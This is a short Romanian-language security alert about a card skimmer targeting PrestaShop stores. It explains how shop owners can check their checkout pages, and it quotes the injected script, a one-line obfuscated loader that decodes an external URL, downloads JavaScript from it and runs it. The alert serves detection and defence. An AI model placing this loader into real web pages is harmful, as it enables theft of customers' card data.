Alertă de securitate Prestashop
PrestaShop a lansat un comunicat prin care sfătuiește toți detinătorii de magazine online create în platforma lor să facă o serie de verificări de siguranță ale site-urilor .
Comunicatul face referire la un script malițios (“digital skimmer”), responsabil pentru furtul datelor de plată ale clienților .
Acest malware schimbă în mod intenționat butoanele de plată din paginile de finalizare comandă cu altele frauduloase. Când sunt accesate, acestea duc spre o altă pagina externă urmând să copieze și să folosească în mod ilicit datele cardului.
Scriptul este de obicei introdus în fișierul _partials/head.tpl al temei active, ceea ce indică faptul că magazinul a fost compromis.
Recomandare:
Verifică urgent securitatea magazinului PrestaShop și asigura-te că nu a fost afectat.
Echipele tehnice PrestaShop investighează situația pentru a preveni alte incidente.
Cum verifici dacă magazinul este afectat?
În front office:
- Deschideți site-ul.
- Click dreapta → Inspect / Inspect Element
- Caută în cod un tag
<script>.
Dacă găsesti un cod similar cu acesta, magazinul este compromis:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Ce poți face dacă site-ul e compromis?
Dacă observi anomalii sau ai suspiciuni, contacteaza imediat responsabilul (dezvoltatorul) site-ului sau accesează suportul PrestaShop.
